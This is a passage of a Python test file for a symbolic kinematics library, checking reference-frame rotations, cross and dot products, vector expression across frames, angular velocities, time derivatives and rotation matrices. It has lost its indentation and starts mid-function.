e3 = UnitVector(A, 3)
assert e1*e2 == e1*e2
assert e1*e2 != e2*e1
assert e2*e1*e3 == e2*e1*e3
assert e2*e1*e3 != e3*e2*e1
def test_UnitVector():
a1 = UnitVector(A, 1)
a2 = UnitVector(A, 2)
a3 = UnitVector(A, 3)
def test_dot_cross():
assert dot(A[1], A[1]) == 1
assert dot(A[1], A[2]) == 0
assert dot(A[1], A[3]) == 0
assert dot(A[2], A[1]) == 0
assert dot(A[2], A[2]) == 1
assert dot(A[2], A[3]) == 0
assert dot(A[3], A[1]) == 0
assert dot(A[3], A[2]) == 0
assert dot(A[3], A[3]) == 1
assert cross(A[1], A[1]) == zero
assert cross(A[1], A[2]) == A[3]
assert cross(A[1], A[3]) == -A[2]
assert cross(A[2], A[1]) == -A[3]
assert cross(A[2], A[2]) == zero
assert cross(A[2], A[3]) == A[1]
assert cross(A[3], A[1]) == A[2]
assert cross(A[3], A[2]) == -A[1]
assert cross(A[3], A[3]) == zero
"""
def test_expressions():
A = ReferenceFrame('A')
x, y = symbols("x y")
e = x+x*A[1]+y+A[2]
assert e == x+x*A[1]+y+A[2]
assert e != x+x*A[1]+x+A[2]
"""
def test_ReferenceFrame():
A = ReferenceFrame('A')
phi = Symbol("phi")
B = A.rotate("B", 1, phi)
assert B.transforms[A] is not None
B = A.rotate("B", 2, phi)
assert B.transforms[A] is not None
B = A.rotate("B", 3, phi)
assert B.transforms[A] is not None
def test_cross_different_frames1():
assert cross(N[1], A[1]) == sin(q1)*A[3]
assert cross(N[1], A[2]) == cos(q1)*A[3]
assert cross(N[1], A[3]) == -sin(q1)*A[1]-cos(q1)*A[2]
assert cross(N[2], A[1]) == -cos(q1)*A[3]
assert cross(N[2], A[2]) == sin(q1)*A[3]
assert cross(N[2], A[3]) == cos(q1)*A[1]-sin(q1)*A[2]
assert cross(N[3], A[1]) == A[2]
assert cross(N[3], A[2]) == -A[1]
assert cross(N[3], A[3]) == 0
def test_cross_method():
N = NewtonianReferenceFrame('N')
q, qd = N.declare_coords('q', 3)
q1, q2, q3 = q
A = N.rotate('A', 1, q1)
B = N.rotate('B', 2, q2)
C = N.rotate('C', 3, q3)
assert cross(N[1], N[1]) == Vector(0) == 0
assert cross(N[1], N[2]) == N[3]
assert N[1].cross(N[3]) == Vector({N[2]: -1})
assert N[2].cross(N[1]) == Vector({N[3]: -1})
assert N[2].cross(N[2]) == Vector(0)
assert N[2].cross(N[3]) == N[1]
assert N[3].cross(N[1]) == N[2]
assert N[3].cross(N[2]) == Vector({N[1]: -1})
assert N[3].cross(N[3]) == Vector(0)
assert N[1].cross(A[1]) == Vector(0)
assert N[1].cross(A[2]) == A[3]
assert N[1].cross(A[3]) == Vector(-A[2])
assert N[2].cross(A[1]) == Vector(-N[3])
assert N[2].cross(A[2]) == Vector(sin(q1)*N[1])
assert N[2].cross(A[3]) == Vector(cos(q1)*N[1])
assert N[1].cross(B[1]) == Vector(sin(q2)*N[2])
assert N[1].cross(B[2]) == N[3]
assert N[1].cross(B[3]) == Vector(-cos(q2)*N[2])
def test_cross_different_frames2():
assert cross(N[1], A[1]) == sin(q1)*A[3]
assert cross(N[1], A[2]) == cos(q1)*A[3]
assert cross(N[1], A[1] + A[2]) == sin(q1)*A[3] + cos(q1)*A[3]
assert cross(A[1] + A[2], N[1]) == -sin(q1)*A[3] - cos(q1)*A[3]
def test_cross_different_frames3():
assert cross(A[1], C[1]) == sin(q3)*C[2]
assert cross(A[1], C[2]) == -sin(q3)*C[1] + cos(q3)*C[3]
assert cross(A[1], C[3]) == -cos(q3)*C[2]
assert cross(C[1], A[1]) == -sin(q3)*C[2]
assert cross(C[2], A[1]) == sin(q3)*C[1] - cos(q3)*C[3]
assert cross(C[3], A[1]) == cos(q3)*C[2]
def test_express1():
assert express(A[1], C) == cos(q3)*C[1] + sin(q3)*C[3]
assert express(A[2], C) == sin(q2)*sin(q3)*C[1] + cos(q2)*C[2] - \
sin(q2)*cos(q3)*C[3]
assert express(A[3], C) == -sin(q3)*cos(q2)*C[1] + sin(q2)*C[2] + \
cos(q2)*cos(q3)*C[3]
def test_express2():
assert A[1].express(N) == Vector(cos(q1)*N[1] + sin(q1)*N[2])
assert A[2].express(N) == Vector(-sin(q1)*N[1] + cos(q1)*N[2])
assert A[3].express(N) == N[3]
assert A[1].express(A) == A[1]
assert A[2].express(A) == A[2]
assert A[3].express(A) == A[3]
assert A[1].express(B) == B[1]
assert A[2].express(B) == Vector(cos(q2)*B[2] - sin(q2)*B[3])
assert A[3].express(B) == Vector(sin(q2)*B[2] + cos(q2)*B[3])
assert A[1].express(C) == Vector(cos(q3)*C[1] + sin(q3)*C[3])
assert A[2].express(C) == Vector(sin(q2)*sin(q3)*C[1] + cos(q2)*C[2] - \
sin(q2)*cos(q3)*C[3])
assert A[3].express(C) == Vector(-sin(q3)*cos(q2)*C[1] + sin(q2)*C[2] + \
cos(q2)*cos(q3)*C[3])
def test_express3():
# Check to make sure UnitVectors get converted properly
assert express(N[1], N) == N[1]
assert express(N[2], N) == N[2]
assert express(N[3], N) == N[3]
assert express(N[1], A) == Vector(cos(q1)*A[1] - sin(q1)*A[2])
assert express(N[2], A) == Vector(sin(q1)*A[1] + cos(q1)*A[2])
assert express(N[3], A) == A[3]
assert express(N[1], B) == Vector(cos(q1)*B[1] - sin(q1)*cos(q2)*B[2] + \
sin(q1)*sin(q2)*B[3])
assert express(N[2], B) == Vector(sin(q1)*B[1] + cos(q1)*cos(q2)*B[2] - \
sin(q2)*cos(q1)*B[3])
assert express(N[3], B) == Vector(sin(q2)*B[2] + cos(q2)*B[3])
assert express(N[1], C) == Vector(
(cos(q1)*cos(q3)-sin(q1)*sin(q2)*sin(q3))*C[1] -
sin(q1)*cos(q2)*C[2] +
(sin(q3)*cos(q1)+sin(q1)*sin(q2)*cos(q3))*C[3])
assert express(N[2], C) == Vector(
(sin(q1)*cos(q3) + sin(q2)*sin(q3)*cos(q1))*C[1] +
cos(q1)*cos(q2)*C[2] +
(sin(q1)*sin(q3) - sin(q2)*cos(q1)*cos(q3))*C[3])
assert express(N[3], C) == Vector(-sin(q3)*cos(q2)*C[1] + sin(q2)*C[2] +
cos(q2)*cos(q3)*C[3])
assert express(A[1], N) == Vector(cos(q1)*N[1] + sin(q1)*N[2])
assert express(A[2], N) == Vector(-sin(q1)*N[1] + cos(q1)*N[2])
assert express(A[3], N) == N[3]
assert express(A[1], A) == A[1]
assert express(A[2], A) == A[2]
assert express(A[3], A) == A[3]
assert express(A[1], B) == B[1]
assert express(A[2], B) == Vector(cos(q2)*B[2] - sin(q2)*B[3])
assert express(A[3], B) == Vector(sin(q2)*B[2] + cos(q2)*B[3])
assert express(A[1], C) == Vector(cos(q3)*C[1] + sin(q3)*C[3])
assert express(A[2], C) == Vector(sin(q2)*sin(q3)*C[1] + cos(q2)*C[2] -
sin(q2)*cos(q3)*C[3])
assert express(A[3], C) == Vector(-sin(q3)*cos(q2)*C[1] + sin(q2)*C[2] +
cos(q2)*cos(q3)*C[3])
assert express(B[1], N) == Vector(cos(q1)*N[1] + sin(q1)*N[2])
assert express(B[2], N) == Vector(-sin(q1)*cos(q2)*N[1] +
cos(q1)*cos(q2)*N[2] + sin(q2)*N[3])
assert express(B[3], N) == Vector(sin(q1)*sin(q2)*N[1] -
sin(q2)*cos(q1)*N[2] + cos(q2)*N[3])
assert express(B[1], A) == A[1]
assert express(B[2], A) == Vector(cos(q2)*A[2] + sin(q2)*A[3])
assert express(B[3], A) == Vector(-sin(q2)*A[2] + cos(q2)*A[3])
assert express(B[1], B) == B[1]
assert express(B[2], B) == B[2]
assert express(B[3], B) == B[3]
assert express(B[1], C) == Vector(cos(q3)*C[1] + sin(q3)*C[3])
assert express(B[2], C) == C[2]
assert express(B[3], C) == Vector(-sin(q3)*C[1] + cos(q3)*C[3])
assert express(C[1], N) == Vector(
(cos(q1)*cos(q3)-sin(q1)*sin(q2)*sin(q3))*N[1] +
(sin(q1)*cos(q3)+sin(q2)*sin(q3)*cos(q1))*N[2] -
sin(q3)*cos(q2)*N[3])
assert express(C[2], N) == Vector(
-sin(q1)*cos(q2)*N[1] + cos(q1)*cos(q2)*N[2] + sin(q2)*N[3])
assert express(C[3], N) == Vector(
(sin(q3)*cos(q1)+sin(q1)*sin(q2)*cos(q3))*N[1] +
(sin(q1)*sin(q3)-sin(q2)*cos(q1)*cos(q3))*N[2] +
cos(q2)*cos(q3)*N[3])
assert express(C[1], A) == Vector(cos(q3)*A[1] + sin(q2)*sin(q3)*A[2] -
sin(q3)*cos(q2)*A[3])
assert express(C[2], A) == Vector(cos(q2)*A[2] + sin(q2)*A[3])
assert express(C[3], A) == Vector(sin(q3)*A[1] - sin(q2)*cos(q3)*A[2] +
cos(q2)*cos(q3)*A[3])
assert express(C[1], B) == Vector(cos(q3)*B[1] - sin(q3)*B[3])
assert express(C[2], B) == B[2]
assert express(C[3], B) == Vector(sin(q3)*B[1] + cos(q3)*B[3])
assert express(C[1], C) == C[1]
assert express(C[2], C) == C[2]
assert express(C[3], C) == C[3] == Vector(C[3])
# Check to make sure Vectors get converted back to UnitVectors
assert N[1] == express(Vector(cos(q1)*A[1] - sin(q1)*A[2]), N)
assert N[2] == express(Vector(sin(q1)*A[1] + cos(q1)*A[2]), N)
assert N[1] == express(Vector(cos(q1)*B[1] - sin(q1)*cos(q2)*B[2] +
sin(q1)*sin(q2)*B[3]), N)
assert N[2] == express(Vector(sin(q1)*B[1] + cos(q1)*cos(q2)*B[2] -
sin(q2)*cos(q1)*B[3]), N)
assert N[3] == express(Vector(sin(q2)*B[2] + cos(q2)*B[3]), N)
assert N[1] == express(Vector(
(cos(q1)*cos(q3)-sin(q1)*sin(q2)*sin(q3))*C[1] -
sin(q1)*cos(q2)*C[2] +
(sin(q3)*cos(q1)+sin(q1)*sin(q2)*cos(q3))*C[3]), N)
assert N[2] == express(Vector(
(sin(q1)*cos(q3) + sin(q2)*sin(q3)*cos(q1))*C[1] +
cos(q1)*cos(q2)*C[2] +
(sin(q1)*sin(q3) - sin(q2)*cos(q1)*cos(q3))*C[3]), N)
assert N[3] == express(Vector(-sin(q3)*cos(q2)*C[1] + sin(q2)*C[2] +
cos(q2)*cos(q3)*C[3]), N)
assert A[1] == express(Vector(cos(q1)*N[1] + sin(q1)*N[2]), A)
assert A[2] == express(Vector(-sin(q1)*N[1] + cos(q1)*N[2]), A)
assert A[2] == express(Vector(cos(q2)*B[2] - sin(q2)*B[3]), A)
assert A[3] == express(Vector(sin(q2)*B[2] + cos(q2)*B[3]), A)
assert A[1] == express(Vector(cos(q3)*C[1] + sin(q3)*C[3]), A)
# Tripsimp messes up here too.
#print express(Vector(sin(q2)*sin(q3)*C[1] + cos(q2)*C[2] -
# sin(q2)*cos(q3)*C[3]), A)
assert A[2] == express(Vector(sin(q2)*sin(q3)*C[1] + cos(q2)*C[2] -
sin(q2)*cos(q3)*C[3]), A)
assert A[3] == express(Vector(-sin(q3)*cos(q2)*C[1] + sin(q2)*C[2] +
cos(q2)*cos(q3)*C[3]), A)
assert B[1] == express(Vector(cos(q1)*N[1] + sin(q1)*N[2]), B)
assert B[2] == express(Vector(-sin(q1)*cos(q2)*N[1] +
cos(q1)*cos(q2)*N[2] + sin(q2)*N[3]), B)
assert B[3] == express(Vector(sin(q1)*sin(q2)*N[1] -
sin(q2)*cos(q1)*N[2] + cos(q2)*N[3]), B)
assert B[2] == express(Vector(cos(q2)*A[2] + sin(q2)*A[3]), B)
assert B[3] == express(Vector(-sin(q2)*A[2] + cos(q2)*A[3]), B)
assert B[1] == express(Vector(cos(q3)*C[1] + sin(q3)*C[3]), B)
assert B[3] == express(Vector(-sin(q3)*C[1] + cos(q3)*C[3]), B)
assert C[1] == express(Vector(
(cos(q1)*cos(q3)-sin(q1)*sin(q2)*sin(q3))*N[1] +
(sin(q1)*cos(q3)+sin(q2)*sin(q3)*cos(q1))*N[2] -
sin(q3)*cos(q2)*N[3]), C)
assert C[2] == express(Vector(
-sin(q1)*cos(q2)*N[1] + cos(q1)*cos(q2)*N[2] + sin(q2)*N[3]), C)
assert C[3] == express(Vector(
(sin(q3)*cos(q1)+sin(q1)*sin(q2)*cos(q3))*N[1] +
(sin(q1)*sin(q3)-sin(q2)*cos(q1)*cos(q3))*N[2] +
cos(q2)*cos(q3)*N[3]), C)
assert C[1] == express(Vector(cos(q3)*A[1] + sin(q2)*sin(q3)*A[2] -
sin(q3)*cos(q2)*A[3]), C)
assert C[2] == express(Vector(cos(q2)*A[2] + sin(q2)*A[3]), C)
assert C[3] == express(Vector(sin(q3)*A[1] - sin(q2)*cos(q3)*A[2] +
cos(q2)*cos(q3)*A[3]), C)
assert C[1] == express(Vector(cos(q3)*B[1] - sin(q3)*B[3]), C)
assert C[3] == express(Vector(sin(q3)*B[1] + cos(q3)*B[3]), C)
def test_ang_vel():
A2 = N.rotate('A2', 2, q4)
assert N.ang_vel(N) == Vector(0)
assert N.ang_vel(A) == -q1p*N[3]
assert N.ang_vel(B) == -q1p*A[3] - q2p*B[1]
assert N.ang_vel(C) == -q1p*A[3] - q2p*B[1] - q3p*B[2]
assert N.ang_vel(A2) == -q4p*N[2]
assert A.ang_vel(N) == q1p*N[3]
assert A.ang_vel(A) == Vector(0)
assert A.ang_vel(B) == - q2p*B[1]
assert A.ang_vel(C) == - q2p*B[1] - q3p*B[2]
assert A.ang_vel(A2) == q1p*N[3] - q4p*N[2]
assert B.ang_vel(N) == q1p*A[3] + q2p*A[1]
assert B.ang_vel(A) == q2p*A[1]
assert B.ang_vel(B) == Vector(0)
assert B.ang_vel(C) == -q3p*B[2]
assert B.ang_vel(A2) == q1p*A[3] + q2p*A[1] - q4p*N[2]
assert C.ang_vel(N) == q1p*A[3] + q2p*A[1] + q3p*B[2]
assert C.ang_vel(A) == q2p*A[1] + q3p*C[2]
assert C.ang_vel(B) == q3p*B[2]
assert C.ang_vel(C) == Vector(0)
assert C.ang_vel(A2) == q1p*A[3] + q2p*A[1] + q3p*B[2] - q4p*N[2]
assert A2.ang_vel(N) == q4p*A2[2]
assert A2.ang_vel(A) == q4p*A2[2] - q1p*N[3]
assert A2.ang_vel(B) == q4p*N[2] - q1p*A[3] - q2p*A[1]
assert A2.ang_vel(C) == q4p*N[2] - q1p*A[3] - q2p*A[1] - q3p*B[2]
assert A2.ang_vel(A2) == Vector(0)
def test_dt():
assert dt(N[1], N) == Vector({})
assert dt(N[2], N) == Vector({})
assert dt(N[3], N) == Vector({})
assert dt(N[1], A) == Vector(-q1p*N[2])
assert dt(N[2], A) == Vector(q1p*N[1])
assert dt(N[3], A) == Vector({})
assert dt(N[1], B) == Vector(-q1p*N[2] + sin(q1)*q2p*N[3])
assert dt(N[2], B) == Vector(q1p*N[1] - cos(q1)*q2p*N[3])
assert dt(N[3], B) == Vector(q2p*A[2])
assert express(dt(N[1], C), N) == Vector((-q1p -
sin(q2)*q3p)*N[2] + (sin(q1)*q2p +
cos(q1)*cos(q2)*q3p)*N[3])
assert express(dt(N[2], C), N) == Vector((q1p +
sin(q2)*q3p)*N[1] + (sin(q1)*cos(q2)*q3p -
cos(q1)*q2p)*N[3])
assert dt(N[3], C) == Vector(q2p*A[2] - cos(q2)*q3p*B[1])
assert dt(A[1], N) == Vector(q1p*A[2]) == q1p*A[2]
assert dt(A[2], N) == Vector(-q1p*A[1]) == -q1p*A[1]
assert dt(A[3], N) == Vector({}) == 0
assert dt(A[1], A) == Vector({}) == 0
assert dt(A[2], A) == Vector({}) == 0
assert dt(A[3], A) == Vector({}) == 0
assert dt(A[1], B) == Vector({}) == 0
assert dt(A[2], B) == Vector(-q2p*A[3]) == -q2p*A[3]
assert dt(A[3], B) == Vector(q2p*A[2]) == q2p*A[2]
assert dt(A[1], C) == Vector(q3p*B[3]) == q3p*B[3]
assert dt(A[2], C) == Vector(sin(q2)*q3p*A[1] - q2p*A[3]) ==\
sin(q2)*q3p*A[1] - q2p*A[3]
assert dt(A[3], C) == Vector(-cos(q2)*q3p*A[1] + q2p*A[2]) \
== -cos(q2)*q3p*A[1] + q2p*A[2]
assert dt(B[1], N) == Vector(cos(q2)*q1p*B[2] -
sin(q2)*q1p*B[3]) == cos(q2)*q1p*B[2] - \
sin(q2)*q1p*B[3]
assert dt(B[2], N) == Vector(-cos(q2)*q1p*B[1] + q2p*B[3]) \
== -cos(q2)*q1p*B[1] + q2p*B[3]
assert dt(B[3], N) == Vector(sin(q2)*q1p*B[1] - q2p*B[2]) ==\
sin(q2)*q1p*B[1] - q2p*B[2]
assert dt(B[1], A) == Vector({}) == 0
assert dt(B[2], A) == Vector(q2p*B[3]) == q2p*B[3]
assert dt(B[3], A) == Vector(-q2p*B[2]) == -q2p*B[2]
def test_get_frames_list1():
assert B.get_frames_list(A) == [B, A]
assert A.get_frames_list(B) == [A, B]
assert A.get_frames_list(C) == [A, B, C]
assert A.get_frames_list(C) == [A, B, C]
assert C.get_frames_list(A) == [C, B, A]
assert B.get_frames_list(C) == [B, A, C]
assert C.get_frames_list(B) == [C, A, B]
def test_get_frames_list1():
q1, q2, q3 = symbols('q1 q2 q3')
N = ReferenceFrame('N')
A = N.rotate('A', 3, q1)
B = A.rotate('B', 1, q2)
C = B.rotate('C', 2, q3)
D = A.rotate('D', 2, q3)
E = D.rotate('E', 2, q3)
F = E.rotate('F', 2, q3)
G = E.rotate('G', 3, q1)
H = G.rotate('H', 2, q3)
I = N.rotate('I', 2, q2)
assert N.get_frames_list(N) == [N]
assert N.get_frames_list(A) == [N, A]
assert N.get_frames_list(B) == [N, A, B]
assert N.get_frames_list(C) == [N, A, B, C]
assert N.get_frames_list(D) == [N, A, D]
assert N.get_frames_list(E) == [N, A, D, E]
assert N.get_frames_list(F) == [N, A, D, E, F]
assert N.get_frames_list(G) == [N, A, D, E, G]
assert N.get_frames_list(H) == [N, A, D, E, G, H]
assert N.get_frames_list(I) == [N, I]
assert A.get_frames_list(N) == [A, N]
assert A.get_frames_list(A) == [A]
assert A.get_frames_list(B) == [A, B]
assert A.get_frames_list(C) == [A, B, C]
assert A.get_frames_list(D) == [A, D]
assert A.get_frames_list(E) == [A, D, E]
assert A.get_frames_list(F) == [A, D, E, F]
assert A.get_frames_list(G) == [A, D, E, G]
assert A.get_frames_list(H) == [A, D, E, G, H]
assert A.get_frames_list(I) == [A, N, I]
assert B.get_frames_list(N) == [B, A, N]
assert B.get_frames_list(A) == [B, A]
assert B.get_frames_list(B) == [B]
assert B.get_frames_list(C) == [B, C]
assert B.get_frames_list(D) == [B, A, D]
assert B.get_frames_list(E) == [B, A, D, E]
assert B.get_frames_list(F) == [B, A, D, E, F]
assert B.get_frames_list(G) == [B, A, D, E, G]
assert B.get_frames_list(H) == [B, A, D, E, G, H]
assert B.get_frames_list(I) == [B, A, N, I]
assert C.get_frames_list(N) == [C, B, A, N]
assert C.get_frames_list(A) == [C, B, A]
assert C.get_frames_list(B) == [C, B]
assert C.get_frames_list(C) == [C]
assert C.get_frames_list(D) == [C, B, A, D]
assert C.get_frames_list(E) == [C, B, A, D, E]
assert C.get_frames_list(F) == [C, B, A, D, E, F]
assert C.get_frames_list(G) == [C, B, A, D, E, G]
assert C.get_frames_list(H) == [C, B, A, D, E, G, H]
assert C.get_frames_list(I) == [C, B, A, N, I]
assert D.get_frames_list(N) == [D, A, N]
assert D.get_frames_list(A) == [D, A]
assert D.get_frames_list(B) == [D, A, B]
assert D.get_frames_list(C) == [D, A, B, C]
assert D.get_frames_list(D) == [D]
assert D.get_frames_list(E) == [D, E]
assert D.get_frames_list(F) == [D, E, F]
assert D.get_frames_list(G) == [D, E, G]
assert D.get_frames_list(H) == [D, E, G, H]
assert D.get_frames_list(I) == [D, A, N, I]
assert E.get_frames_list(N) == [E, D, A, N]
assert E.get_frames_list(A) == [E, D, A]
assert E.get_frames_list(B) == [E, D, A, B]
assert E.get_frames_list(C) == [E, D, A, B, C]
assert E.get_frames_list(D) == [E, D]
assert E.get_frames_list(E) == [E]
assert E.get_frames_list(F) == [E, F]
assert E.get_frames_list(G) == [E, G]
assert E.get_frames_list(H) == [E, G, H]
assert E.get_frames_list(I) == [E, D, A, N, I]
assert F.get_frames_list(N) == [F, E, D, A, N]
assert F.get_frames_list(A) == [F, E, D, A]
assert F.get_frames_list(B) == [F, E, D, A, B]
assert F.get_frames_list(C) == [F, E, D, A, B, C]
assert F.get_frames_list(D) == [F, E, D]
assert F.get_frames_list(E) == [F, E]
assert F.get_frames_list(F) == [F]
assert F.get_frames_list(G) == [F, E, G]
assert F.get_frames_list(H) == [F, E, G, H]
assert F.get_frames_list(I) == [F, E, D, A, N, I]
assert G.get_frames_list(N) == [G, E, D, A, N]
assert G.get_frames_list(A) == [G, E, D, A]
assert G.get_frames_list(B) == [G, E, D, A, B]
assert G.get_frames_list(C) == [G, E, D, A, B, C]
assert G.get_frames_list(D) == [G, E, D]
assert G.get_frames_list(E) == [G, E]
assert G.get_frames_list(F) == [G, E, F]
assert G.get_frames_list(G) == [G]
assert G.get_frames_list(H) == [G, H]
assert G.get_frames_list(I) == [G, E, D, A, N, I]
assert H.get_frames_list(N) == [H, G, E, D, A, N]
assert H.get_frames_list(A) == [H, G, E, D, A]
assert H.get_frames_list(B) == [H, G, E, D, A, B]
assert H.get_frames_list(C) == [H, G, E, D, A, B, C]
assert H.get_frames_list(D) == [H, G, E, D]
assert H.get_frames_list(E) == [H, G, E]
assert H.get_frames_list(F) == [H, G, E, F]
assert H.get_frames_list(G) == [H, G]
assert H.get_frames_list(H) == [H]
assert H.get_frames_list(I) == [H, G, E, D, A, N, I]
assert I.get_frames_list(N) == [I, N]
assert I.get_frames_list(A) == [I, N, A]
assert I.get_frames_list(B) == [I, N, A, B]
assert I.get_frames_list(C) == [I, N, A, B, C]
assert I.get_frames_list(D) == [I, N, A, D]
assert I.get_frames_list(E) == [I, N, A, D, E]
assert I.get_frames_list(F) == [I, N, A, D, E, F]
assert I.get_frames_list(G) == [I, N, A, D, E, G]
assert I.get_frames_list(H) == [I, N, A, D, E, G, H]
assert I.get_frames_list(I) == [I]
def test_get_frames_list4():
D = A.rotate('D', 1, q4)
E = D.rotate('E', 3, q5)
F = E.rotate('F', 2, q6)
assert B.get_frames_list(N) == [B, A, N]
assert N.get_frames_list(B) == [N, A, B]
assert C.get_frames_list(N) == [C, B, A, N]
assert N.get_frames_list(C) == [N, A, B, C]
def test_get_rot_matrices1():
B_A = Matrix([
[1, 0, 0],
[0, cos(q2), sin(q2)],
[0, -sin(q2), cos(q2)]
])
A_B = Matrix([
[1, 0, 0],
[0, cos(q2), -sin(q2)],
[0, sin(q2), cos(q2)]
])
B_C = Matrix([
[cos(q3), 0, sin(q3)],
[0, 1, 0],
[-sin(q3), 0, cos(q3)]
])
C_B = Matrix([
[cos(q3), 0, -sin(q3)],
[0, 1, 0],
[sin(q3), 0, cos(q3)]
])
assert B.get_rot_matrices(B) == [eye(3)]
assert B.get_rot_matrices(A) == [A_B]
assert A.get_rot_matrices(B) == [B_A]
assert A.get_rot_matrices(C) == [C_B, B_A]
assert C.get_rot_matrices(A) == [A_B, B_C]
def test_get_rot_matrices2():
D = A.rotate('D', 2, q4)
E = D.rotate('E', 1, q5)
F = E.rotate('F', 3, q6)
A_B = Matrix([
[1, 0, 0],
[0, cos(q2), -sin(q2)],
[0, sin(q2), cos(q2)],
])
B_A = A_B.T
B_C = Matrix([
[cos(q3), 0, sin(q3)],
[0, 1, 0],
[-sin(q3), 0, cos(q3)],
])
C_B = B_C.T
A_D = Matrix([
[cos(q4), 0, sin(q4)],
[0, 1, 0],
[-sin(q4), 0, cos(q4)],
])
D_A = A_D.T
D_E = Matrix([
[1, 0, 0],
[0, cos(q5), -sin(q5)],
[0, sin(q5), cos(q5)],
])
E_D = D_E.T
E_F = Matrix([
[cos(q6), -sin(q6), 0],
[sin(q6), cos(q6), 0],
[0, 0, 1],
])
F_E = E_F.T
assert C.get_rot_matrices(F) == [F_E, E_D, D_A, A_B, B_C]
assert F.get_rot_matrices(C) == [C_B, B_A, A_D, D_E, E_F]
def test_cross2():
for i in (1, 2, 3):
for j in (1, 2, 3):
a = cross(N[i], A[j])
b = express(cross(N[i], A[j]), A)
assert a == b
for i in range(1, 4):
for j in range(1, 4):
a = cross(N[i], B[j])
b = express(cross(B[j], N[i]), N)
assert a == -b
def test_dot2():
for i in range(1, 4):
for j in range(1, 4):
a = dot(N[i], A[j])
b = dot(A[j], N[i])
assert a == b
for i in range(1, 4):
for j in range(1, 4):
a = dot(N[i], B[j])
b = dot(B[j], N[i])
assert a == b
def test_Vector_class():
t = symbols('t')
u1 = Function('u1')(t)
v1 = Vector(0)
v2 = Vector(q1*u1*A[1] + q2*t*sin(t)*A[2])
v3 = Vector({B[1]: q1*sin(q2), B[2]: t*u1*q1*sin(q2)})
# Basic functionality tests
assert v1.parse_terms(A[1]) == {A[1]: 1}
assert v1.parse_terms(0) == {}
assert v1.parse_terms(S(0)) == {}
assert v1.parse_terms(q1*sin(t)*A[1] + A[2]*cos(q2)*u1) == {A[1]: \
q1*sin(t), A[2]: cos(q2)*u1}
test = sin(q1)*sin(q1)*q2*A[3] + q1*A[2] + S(0) + cos(q3)*A[2]
assert v1.parse_terms(test) == {A[3]: sin(q1)*sin(q1)*q2, \
A[2]:cos(q3) + q1}
# Equality tests
v4 = v2 + v3
assert v4 == v2 + v3
v3 = Vector({B[1]: q1*sin(q2), B[2]: t*u1*q1*sin(q2)})
v5 = Vector({B[1]: q1*sin(q2), B[2]: t*u1*q1*sin(q2)})
assert v3 == v5
# Another way to generate the same vector
v5 = Vector(q1*sin(q2)*B[1] + t*u1*q1*sin(q2)*B[2])
assert v3 == v5
assert v5.dict == {B[1]: q1*sin(q2), B[2]: t*u1*q1*sin(q2)}
def test_mag():
A = ReferenceFrame('A')
v1 = Vector(A[1])
v2 = Vector(A[1] + A[2])
v3 = Vector(A[1] + A[2] + A[3])
v4 = -A[1]
assert v1.mag == 1
assert v2.mag == 2**Rational(1,2)
assert v3.mag == 3**Rational(1,2)
assert v4.mag == 1
def test_rotate_Euler_Space():
c1 = cos(q1)
c2 = cos(q2)
c3 = cos(q3)
s1 = sin(q1)
s2 = sin(q2)
s3 = sin(q3)
#### Rotation matrices from Spacecraft Dynamics, by Kane, Likins, Levinson,
#### 1982, Appendix I, pg. 422
########### DIRECTION COSINE MATRICES AS FUNCTIONS OF ORIENTATION ANGLES
#### Euler Angles (Body Fixed rotations) ####
#### Body 1-2-3
B = A.rotate('B', 'BODY123', (q1, q2, q3))
R123_Body = Matrix([ [ c2*c3, -c2*s3, s2],
[s1*s2*c3 + s3*c1, -s1*s2*s3 + c3*c1, -s1*c2],
[-c1*s2*c3 + s3*s1, c1*s2*s3 + c3*s1, c1*c2]])
W_B_A = Vector((q1p*c2*c3 + q2p*s3)*B[1] + (-q1p*c2*s3+q2p*c3)*B[2] +
(q1p*s2 + q3p)*B[3])
assert B.get_rot_matrices(A)[0] == R123_Body
assert B.ang_vel(A) == W_B_A
#### Body 1-3-2
B = A.rotate('B', 'BODY132', (q1, q2, q3))
R132_Body = Matrix([ [c2*c3, -s2, c2*s3],
[c1*s2*c3 + s3*s1, c1*c2, c1*s2*s3 - c3*s1],
[s1*s2*c3 - s3*c1, s1*c2, s1*s2*s3 + c3*c1]])
W_B_A = Vector((q1p*c2*c3 - q2p*s3)*B[1] + (-q1p*s2+q3p)*B[2] + (q1p*c2*s3
+ q2p*c3)*B[3])
assert B.get_rot_matrices(A)[0] == R132_Body
assert B.ang_vel(A) == W_B_A
#### Space Fixed rotations ####
#### Space 1-2-3
B = A.rotate('B', 'SPACE123', (q1, q2, q3))
R123_Space = Matrix([ [c2*c3, s1*s2*c3 - s3*c1, c1*s2*c3 + s3*s1],
[c2*s3, s1*s2*s3 + c3*c1, c1*s2*s3 - c3*s1],
[-s2, s1*c2, c1*c2]])
assert B.get_rot_matrices(A)[0] == R123_Space
#### Space 1-3-2
B = A.rotate('B', 'SPACE132', (q1, q2, q3))
R132_Space = Matrix([ [c2*c3, -c1*s2*c3 + s3*s1, s1*s2*c3 + s3*c1],
[s2, c1*c2, -s1*c2],
[-c2*s3, c1*s2*s3 + c3*s1, -s1*s2*s3 + c3*c1]])
print B.get_rot_matrices(A)[0]
print R132_Space
assert B.get_rot_matrices(A)[0] == R132_Space
def test_Point_get_point_list():
l1, l2, l3 = symbols('l1 l2 l3')
A = N.rotate('A', 1, q1)
P1 = N.O.locate('P1', l1*N[1])
P2 = N.O.locate('P2', l2*A[2])
P3 = P2.locate('P3', l3*A[3])
P4 = P3.locate('P4', 2*A[2] + 3*A[1])
P5 = P3.locate('P5', 6*N[1] + 4*A[2])
assert P1.get_point_list(N.O) == [P1, N.O]
assert P1.get_point_list(P1) == [P1]
assert P1.get_point_list(P2) == [P1, N.O, P2]
assert P1.get_point_list(P3) == [P1, N.O, P2, P3]
assert P1.get_point_list(P4) == [P1, N.O, P2, P3, P4]
assert P1.get_point_list(P5) == [P1, N.O, P2, P3, P5]
assert P2.get_point_list(N.O) == [P2, N.O]
assert P2.get_point_list(P1) == [P2, N.O, P1]
assert P2.get_point_list(P2) == [P2]
assert P2.get_point_list(P3) == [P2, P3]
assert P2.get_point_list(P4) == [P2, P3, P4]
assert P2.get_point_list(P5) == [P2, P3, P5]
assert P3.get_point_list(N.O) == [P3, P2, N.O]
assert P3.get_point_list(P1) == [P3, P2, N.O, P1]
assert P3.get_point_list(P2) == [P3, P2]
assert P3.get_point_list(P3) == [P3]
assert P3.get_point_list(P4) == [P3, P4]
assert P3.get_point_list(P5) == [P3, P5]
assert P4.get_point_list(N.O) == [P4, P3, P2, N.O]
assert P4.get_point_list(P1) == [P4, P3, P2, N.O, P1]
